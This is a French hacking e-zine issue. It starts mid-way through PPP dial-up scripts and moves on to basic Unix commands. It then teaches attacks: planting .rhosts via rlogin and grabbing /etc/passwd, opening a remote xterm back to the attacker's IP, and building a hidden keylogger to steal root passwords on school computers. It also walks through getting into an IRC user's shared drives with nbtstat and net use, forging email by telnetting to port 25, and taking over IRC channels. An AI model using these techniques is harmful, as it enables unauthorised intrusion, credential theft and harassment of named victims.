                        # si vous avez pas d'ip fixe)
REMOTE_IP=0.0.0.0	# Remote IP address if desired. (la rentrez le DNS
                        # primaire de votre fournisseur d'acces)
NETMASK=255.255.255.0	# The proper netmask if needed (là laissez la valeur par defaut)
#
# Export them so that they will be available at 'ppp-on-dialer' time.
export TELEPHONE ACCOUNT PASSWORD
# 
# This is the location of the script which dials the phone and logs
# in.  Please use the absolute file name as the $PATH variable is not
# used on the connect option.  (To do so on a 'root' account would be
# a security hole so don't ask.)
#
DIALER_SCRIPT=/etc/ppp/ppp-on-dialer
#
# Initiate the connection
# 
# I put most of the common options on this command. Please, don't
# forget the 'lock' option or some programs such as mgetty will not
# work. The asyncmap and escape will permit the PPP link to work with
# a telnet or rlogin connection. You are welcome to make any changes
# as desired. Don't use the 'defaultroute' option if you currently
# have a default route to an ethernet gateway.
#
exec /usr/sbin/pppd debug lock modem crtscts /dev/ttyS1 38400 \
	asyncmap 20A0000 escape FF kdebug 0 $LOCAL_IP:$REMOTE_IP \
	noipdefault netmask $NETMASK defaultroute connect $DIALER_SCRIPT

------cut-----cut------cut-------cut-----------cut-------cut---------cut------
Script PPP-OFF :
------cut-----cut------cut-------cut-----------cut-------cut---------cut------

#!/bin/sh
######################################################################
#
# Determine the device to be terminated.
#
if [ "$1" = "" ]; then
	DEVICE=ppp0
else
	DEVICE=$1
fi

######################################################################
#
# If the ppp0 pid file is present then the program is running. Stop it.
if [ -r /var/run/$DEVICE.pid ]; then
        kill -INT `cat /var/run/$DEVICE.pid`
#
# If the kill did not work then there is no process running for this
# pid. It may also mean that the lock file will be left. You may wish
# to delete the lock file at the same time.
        if [ ! "$?" = "0" ]; then
                rm -f /var/run/$DEVICE.pid
                echo "ERROR: Removed stale pid file"
                exit 1
        fi
#
# Success. Let pppd clean up its own junk.
        echo "PPP link to $DEVICE terminated."
        exit 0
fi
#
# The ppp process is not running for ppp0
echo "ERROR: PPP link is not active on $DEVICE"
exit 1

------cut-----cut------cut-------cut-----------cut-------cut---------cut------
ppp-on-dialer :
------cut-----cut------cut-------cut-----------cut-------cut---------cut------

#!/bin/sh
#
# This is part 2 of the ppp-on script. It will perform the connection
# protocol for the desired connection.
#
exec chat -v						\
	TIMEOUT		100				\
	ABORT		'\nBUSY\r'			\
	ABORT		'\nNO ANSWER\r'			\
	ABORT		'\nRINGING\r\n\r\nRINGING\r'	\
	''		\rAT				\
	'OK-+++\c-OK'	ATH0				\
	TIMEOUT		100				\
	OK		ATDT$TELEPHONE			\
	CONNECT		''				\
	ogin:--ogin:	$ACCOUNT			\
	assword:	$PASSWORD

------cut-----cut------cut-------cut-----------cut-------cut---------cut------


IV-LES SCRIPTS 
XXXXXXXXXXXXXX

Bon alors qu'est ce qu'un script , et bien en gros c'est un regroupement
de commandes , hehe ca c'est de la definition :))))) en fait c'est du language
de programmation : c,c++,Perl et il faut le transformer en language machine
pour que votre ordi pige ; ba oui a la base c'est programme pas pour une
machine spécifique c'est du c ou ... tout court :)
en fait ce sont des petits programmes qui servent à ameliorer , booster ,
(Je rapelle que le C est un language de programmation doc forcement faut le
compiler votre programme sinon forceme marche poa :p.)
rajouter des commandes a un programme existant.De plus certains scripts peuv-
ent etre très utils dans le hacking comme des spoofers , script d'icmp amel-
iorant la commande ping initiale...
Ces scripts sont la plupart du temps non compilés,ainsi vous pouvez le compi-
ler pour votre type de machine.
si vous avez linux ou un unix systeme V...
pas de panique c'est tout con pour compiler :)
vous tapez : 
cc toto.c -o toto
ou gcc toto.c -o toto (ceci est le compilateur GNU)
(exemple si le script s'apelle toto.c :))
et la vous avez le programme près à etre executé.

PHASE DE COMPILATION D'UN PROGRAMME EN C :
    --------------            -------------             ---------
    fichier source ---------->fichier objet ----------->Programme
    --------------            -------------     ^       ---------
                                                |
                                                |
                                                |
                                          -------------
                                          Bibliotheques
                                          -------------
           
           
V-L'EDITEUR DE TEXTES VI
XXXXXXXXXXXXXXXXXXXXXXXX

La rien de bien complqiue mais vi est vital pour tout linuxien qui se respecte
alors faut mieux savoir s'en servire car vous verez par exemple plus loin dans
cette doc que pour creer un .rhosts par exemple , ca peut servir :=)
alors totu con pour creer un fichier tapez "vi lenomdufichier"
pour editer un fichier pareil vi et lenomdufichier
Vous avez deux modes dans vi , le mode commande et le mode saisie
au debut vous vous trouvez dans le mode commande , la vous n'pouvez rien
ecrire , il vout faut passer en mode saise en appuyant sur a ou i
a(append);i(insert)
toutes les modifications sont effectuées sur une memoire tampon qui sera plus
tard enregistrée sur le disk lorsque vous quitterez l'editeur en tapant "ZZ"
pour quitter l'editeur sans sauvegarder les modifications : taper : :q! puis
validez entrée
pour enregistrer sur le disk des modifs sans partir immediatement taper :
:w puis valider entrée
touches directionnelles pour se balader dans le texte
Voila en gros les commandes courantes , il existe bien trop de commande pour 
que je puisse en effectuer un inventaire complet ici.

VI-COMMANDES TELNET ET RLOGIN
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX

A-TELNET
--------

Vous serez amene a les utliser tres frequemment alors mieux vaut bien les
connaitre des maintenant.
Bon telenet en gros ca sert a se connecter sur une autre machine et plus
particulierement c'qui nous interesse : un serveur unix systeme V.
cependant la commande telnet est assez souple et ne recquiert pas que l'autre
machine soit sous un system UNIX juste la gestion des protocoles TCP/IP suffit
Vous avez deja je pense fait du ftp et bien a la difference du ftp ou vous ne
pouviez juste recuperer des fichiers sur le disque du serveur et bien en 
telnet , vous pouvez controler ce serveur , c'est a dire lui faire effectuer 
des taches , comme lui meme effectuer un ftp sur un autre server ou une cray 
decrypte pour vous des pass par exemple ;).Cependant pour ces operations il
vous faudra un acces complet au systeme : le root , un acces user etant tres
limite , a votre seul repertoire...
Ce systeme devient en fait votre systeme et éffectue les taches auxquelles
vous l'aurez affecté.
Les commandes a taper en telnet sont de l'unix, donc rien de depaysant
pour annuler une operation pressez "ctrl-c"
ls:liste des fichiers
mkdir:créer un repertoire
cd ..:sortir d'un repertoire
cd repertoire:rentrer dans un repertoire
...
bon now arrivons au telnet par lui meme pour realiser un telnet tapez :
telnet adresse
vous arriverez alors a un prompt qui vous demandera de rentrer un login puis
un pass
apres cela vous avez le shell comme sous linux :)
Vous pouvez aussi vous connecter a un port précis voulu comme le port 25 des
mails : tapez : telnet adresse 25
--->Voir la section sur les ports pour plus de details

B-RLOGIN
--------

La fonction pratique par excellence , j'explique un peu :
un rlogin vous permet de vous loguer sur une machine sans avoir a donner de
pass :) j'vous vois deja avec un gros souris jusqu'aux oreilles mais c'est pas
si simple ;)
En effet comme expliqué dans une autre partie , en montant un repertoire
export et en prenant ce login , l'on peut alors passer par le rlogin adresse
et etre alors directement logué dans c'te repertoire :)
(pratique pour recuperer /etc/passwd ou foutre un .rhosts)
(euhh paniquez pas j'aborderais longement et en detail ca plus tard =))
La seule probleme est lorque vous tombez sur des rlogin patchés alors la pas
de bol :((( car bien qu'elle fesait confiance a c'te putain de machine y a une
demande de pass :((
(ps : paniquez pas y a d'autres failles notamment les NIS et là y peuvent pas
y faire grand chose :))) ;))

C-RSH
-----
Permet de vous connecter comme avec un rlogin mais en toute propreté , vous
ne serez pas logué , plus qu'à vous envoyer un xterm de là et c'est dans la
poche :)
commande : "rsh machine -l login csh -i"
Pour vous envoyer un xterm de la machine:"xterm -display 154.248.56.12:0 &"
(154.248.56.12 etant votre ip donc rentrez pas c'te valeur)
en meme pas oubliez pas de faire un ch'ti "xhost +" chez vous sinon le xterm 
que vous enverra le serveur ne sera pas accepté car 'non authorisé'(de plus pas
oublier de refaire un "xhost -" juste après car tout le monde peut se connecter
sur votre machine sinon...).

Bon c'est deja pas mal la suite au prochain numero.

GRetZZ:Bld(Coucou!!!:),Le pingouin DE linux,La doc de linux....................
¯¯¯¯¯¯¯




ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ4)Les EspionsÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


Bon on est pas 007 mais va faire  tout comme, une premiere chose ce n'est pas un mouchard mais juste la
base du programme d'un espions.Y va servir a quoi? Y va servir a vous donner des codes d'accés.Comment?
En relevant les codes des touches ascii(non pas "à ski" les sports d'hiver c'est fini)



Programmation d'un espion: 
(avec exemple d'utilités en cadeau)
==========================

1) Un espion qu'est ce que c'est?

Un espion est un programme (le plus petit possible) qu'on introduit sournoisement (pas bien !!!!!!) sur un
réseau afin d'y récupérer les codes d'acces.En voiçi un petit exemple,celui ci affiche a l'ecran les codes 
ascii des touches de 180 à 204.


Ex:

#include <stdio.h>
unsigned char x;
main()
{
 for (x = 180; x < 204; x++)
 {
  printf("\nLe code ASCI %d correspond au caractere %c", x,  x);
 }
  return 0;
 }

-----------------------------------------------------------------------------
Note:   %d est indispensable pour les nombres
             %c est indispensable pour la saisie des caracteres
             \n = nombre entier ou chaine de caracteres
             x++ = incrémentation de +1 sur la boucle for
-----------------------------------------------------------------------------

Haha!! Yen a un plus interressant qui imprime le code ascii de la touche lorsque l'on appuie dessus.
C'est un comme ca qu'il nous faut.Apres on a juste a rajouter une fonction qui va charger le login du
reseau et de faire un enregistrement des appuies des touches vers un fichiers TEXT.(tranquille emile :)

Ex:

#include <stdio.h>
#include <conio.h>
void main(void)
{
 unsigned char c;
 char message[9];
 clrscr();
 printf("\n\n\n\t\t Programme qui affiche les codes de caractere \n ");
 gotoxy(19,10);
 printf("=============================");
 gotoxy(19,11);
 printf("³    type   ³ Code  ascii   ³");
 gotoxy(19,13);
 printf("³           ³               ³");
 gotoxy(19,14);
 printf("=============================");
 while ((c=getch()) != 27)
 {
  sprintf(message, "Normal\0");
  if  (c == 0)
 {
  sprintf(message, "Speciale\0");
  c=getch();        
 }
 gotoxy(25,13);
 printf("%s", message);
 gotoxy(42,13);
 printf("    ");
 gotoxy(42,13);
 printf("%d", c);
 gotoxy(52,13);
 printf(" ");
 if (c != 9)
 {
  gotoxy(52,13);
  printf("%c",c);
 }
}
printf("\n\n\t ");
printf("Vous venez de faire echap\n");
}

bon on vient de rajouter une library. <conio.h> est essentiel pour faire des GOTOXY ou encore des
Textcolor etc.
-----------------------------------------------------------------------------
note: \t correspond a la tabulation
-----------------------------------------------------------------------------

2)Qu'est ce qui nous manque?

Il nous manque la sortie d'un enregistrement vers le dur.

Enregistrement vers un fichier *.txt

Ex:

#include <stdio.h>
long filesize(FILE *stream);
int main(void)
{
   FILE *stream;

   stream = fopen("password.txt", "w+");
   fprintf(stream, "Ceci est un test\n");
   fprintf(stream, "a ke koukou");
   printf("Filesize of password.txt is %ld bytes\n", filesize(stream));
   fclose(stream);
   return 0;
}

long filesize(FILE *stream)
{
   long curpos, length;

   curpos = ftell(stream);
   fseek(stream, 0L, SEEK_END);
   length = ftell(stream);
   fseek(stream, curpos, SEEK_SET);
   return length;
}

C'est-y pas beau? ce petit programme créé un fichier password.txt dans le répertoire ou il sera excécutéé
puis édite ce fichier en enregistrant, Ceci est un test, a ke koukou (coucou) séparé par une tabulation.
Le plus étonnant c'est qu'à l'éxécution du programme on ne voit pas l'éditeur de texte. Exactement ce qu'
il nous faut car si on fait un bel écran avec des flammes au démarrage ben le prog sera forcémment découvert.
Y nous faut un ecran noir et puis c'est tout.

Que peut-on rajouter de plus?

Euh... voyons... une petite sortie vers imprimente? (Très Marrant et très con, sisi  :)

Ex:

#include <stdio.h>
main()
{
 fprintf(stdprn, "a ke koukou \n\n");
 return 0;
}

voila,ca imprime a ke koukou en haut a gauche de votre imprimente :) 
-----------------------------------------------------------------------------
note:  \a = sonnerie
       \b = retour arriere
       \n = retour a la ligne
       \t = tabulation
       \\ = backflash
-----------------------------------------------------------------------------

Les flots prédéfinis du language C (pour les neuneus,si si ça existe j'en connais un gros et chiant )

STDIN     entrée standart       clavier
STDOUT    sortie standart       écran
STDERR    erreur standart       écran
STDPRN    imprimente standart   imprimente (lpt1)
STDAUX    auxilliaire standart  port série (com1)
-----------------------------------------------------------------------------

Tout ce petit monde là, on le met ça dans le autorun du linux et c'est OK. Vous avez tout c'est petit et 
facilement modifiable,Vous foutez ça dans les PC du CDI et a vous les codes d'acces root :)La prochaine
on verra un variante sous windaube avec une fausse boite de dialogue de login (login+passwd+tel :>)

GReetZZ:Bld(re:),James Bond,Ozzi17(pour l'idée)


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ5)Les partages via le netÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


Très marrant sur irc ,y a un gros con qui te fais chier,il a une carte reseau,y sait pas s'en servir et
toutes ses ressources sont partagées en locals et toi t'es 2000km de chez lui et ton cable RJ45 fais 
que 10 metres; tout n'est pas perdu ;)
 
Tout d'abord la victime doit avoir sélectionné dans sa config réseau :
	Client pour réseau Microsoft
	Partage des fichiers

(Qui ça? un con ou une personne qui a uns carte reseau pour juste pour jouer)Sinon Nada !

Donc comment se connecter .... 
Sous Windoze 95/98 Il faut créer lmhosts et hosts (ca c'est uniquement pour s'amuser par ftp ou telnet)

Structure du lmhosts :
numero ip                "nom du micro distant        "                         #PRE

Comment arriver a voir l'ip du mec !!!
Ben ca c'est facile  :
si c'est un serveur ,moi j'utilise nslookup qui change les www.nnnd.fr en 193....
Ou alors tu ping avec ping -a ou avec un prog fait pour. 


Vous êtes sous Windoze 95/98 ; ouvrir une fenêtre DOS et
taper : 
nbtstat -A ipdumec  
 ATTENTION METTRE un GRAND A (taper nbtstat -h pour plus d'info)
puis si ca marche bien , 
Changer dans le lmhosts et si vous voulez dans hosts numero ip et nom
taper :
nbtstat -R
puis 
net view \\nomdelamachine (elle est donne avant)
y a des ressources partagees?????

si oui taper:
net use * //nommachine/nomressource

le dos vous dit que est nouveau lecteur vous est attribue :-)

la soit vous taper x: (x = nom du nouveau lecteur) soit vous allez ss win :-)

Sous NT pas besoin de changer le lmhosts ni hosts 



Exemple pour rentrer sur le micro de la victime :
Je suis sous mirc et y a une grosse tanche qui fait chier tous le monde(son nick est: tanche).
je le ping et ça dit 194.125.123.12
la, j'ouvre une fenetre dos et je tape nbstat -A 194.125.123.12
ca me dit :
NetBIOS Remote Machine Name Table
Name Type Status
-----------------------
----------------------
Quiche <00> UNIQUE Registered
kkkkkk <00> GROUP  Registered
MAC Address = 44-45-53-54-00-00

donc je sais que je dois utiliser Quiche ( because unique )

j'edit mon fichier lmhosts et mets :
194.125.123.12     " Quiche "   #PRE

De retour sous dos je tape :
nbtstat -R

et j'obtiens :
Successful purge and preload of the NBT Remote Cache Name Table.
puis net view \\Quiche
Ressources partagées à \\Quiche

Nom de partageType         Commentaire
-------------------------------------------------------------------
c        Disque
d        Disque
e        Disque
Exécution achevée.

C:\WINDOWS>net use * \\Quiche\c
M: connecté à \\Quiche\c

ben voila vous etes sur le hd de la victime :-)))
Bon avec cette astuce faites pas de saloperie :-)
Ne prenez pas les pwl , user.dat , eudora.ini , kali.ini ,... :-).

Pour des questions ou autres vous pouvez aller sur le site ou ecrire a :
                    Matrix669@hotmail.com

Un grand Greet a Bld et a Kurby (c'est le mec qui disait que ça marcherait jamais.) 
GreetZZ: Bld et à kowo,Asur,GolDawAY(Les victimes qui ont servit à tester,desole:()
(ben j'ai pas envie de taper 200 lignes non plus )



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ3)Telnet et les MailsÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



Qqun vous emmerde et vous voulez le faire chier par E-Mail mais sans qu'il voit votre adresse
Vous!! une quiche en info c'est pas grave y a telnet de merde sous 95/98
bon ca marche comment? comme avec un facteur :) ou FT :))))
Avant oublie pas d'activer l'echo local c'est plus ergonomique(?).

1)Bon tu te connect en telnet sur le server de ton choix sur le port 25

Ex:
    serveur: mail.pipopipo.fr
    port: 25
    Type de terminal: vt100

2)Là le serveur ce presente (France Telecom Boujour ??)
et ça donne par exemple:

    220 mail.pipopipo.fr
    ESMTP Reseau des pipopipo
    22:41:12 +100 (CET) 

3)Bon tu te presente (j'mappelle Ducul !!)
avec la commande helo <nom>, ex:

    helo ducul.com

4)Le serveur repond(boujour Mr Ducul!)

    250 mail.pipopipo.fr Hello ppp112.monprovider.fr
    [192.150.445.78] pleased to meet you

5)Et la tu lui dit ton adresse mail(j'appelle de trifouilly les oies :)
avec mail from: XXXXXX@XXXXXX.XXX:

    mail from: trou@ducul.com

6)Et la le serveur repond:

    250 trou@ducul.com...sender ok

7)Enfin l'adresse de la victime avec rcpt to: <adresse de la victime>:

rcpt to: victime@nageoire.com

8)le serveur repond(pas besoin de detaille on a compris:)
9)Le plus important ce qui a dedans avec la commande data puis entrée;Le
seveur repond et dit que une fois le data fini tu met un point pour lui dire
que c'est la fin

10)Pouf c'est finit et tu te barre !  :)

Bon pour ceux qu'on pas compris un gros exemple barbare(les truc decale c'est
les reponse du serveur!!!)

Connexion systeme distant à mail.club-internet.fr
Sur le port 25 en vt100
     220 mail.club-internet.fr
     ESMTP Réseau club-internet
     ;Sat, 26 Feb 2000
     00:00:01 +0100 (CET)   
Helo Matrix.com
     250 mail.club-internet.fr
     hello ppp112.club-internet.fr
     [197.150.45.48],pleased to meet you
mail from: matrix@quiquicest.com
     250 matrix@quiquicest.com...sender OK
rcpt to: kleenex@hol.fr
     250 kleenex@hol.fr...recipient OK
data
     354 Enter mail, end with "." on a line by itself
Date: Sat, 26 Feb 2015
04:12:02 +0100
Subject: quiquic'est!!
To: pauv'neuneu
From:No-WhErE!!
Cc:Da master of le monde

Qui qui c'est qui t'envoye ce mail
A+
.
     250 EAA18871 Message accepted for delivery
quit


En plus c'est presque intracable mis a part le
"from matrix.com (ppp112.club-internet.fr [192.150.457.12])
Vi c'est pas grand chose mais le gas reste 2 min sur le nom d'host
et c'est fini t'es griller.


GReetZZZ:Bld,Pirate,Darkness(mon autre moitié) et kleenex (desole:la victime du teste:)     



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEditoÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ  

Bon c'est deja fini faite passer ce mag a vos proches.Desolées pour certaine pompes et faute
d'orthographe.Et y a certain truc de dispo (les exemples) sur ftp en ""PGP""

Les gros GreeetZZZZZZ: Bld,darkness,kowo,asur,goldaway,kurby et cette tanche de Kleenex qui fait chier 
assez souvent mais que je ne peut me passer.

JEU:
¯¯¯¯
      decrypter ceci et gagne une place sur le sujet de ton choix dans le prochain numero:
       (il y a une aide dans ce numero)          

				   ******************	
                                   *6767677667767676*
                                   *6658838998388566*
				   ******************	
BONUS:
¯¯¯¯¯¯
                       L'IRC(Internet Relay Chat)by Matrix
                       ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


1)l'irc c'est cool mais le op y fait souvent chier(celuiavec "@" avant son nick)
    Et le bomber ca marche pas le nuker, le oober non plus(grrrr:)
    alors pas 36 solutions on le jarte: comme un homme politique!!!!! :)
    On pique sa place!
   *)faut d'abord trouver un serveur qui est spliter (comment? tu le kick ou tu 
    l'envoye volée a la main; y patatouille qqelque temps)pendant ce temps
    tu va dessus et tu créé un channel qui a le meme nom que celui ou est l'op
    quand le serveur se reconnecter sur le net et la ho miracle t'es serverOP
    et tu peux faire tout ce que tu veux(kicker,banir,etc tout le monde)





Mega fin du #1



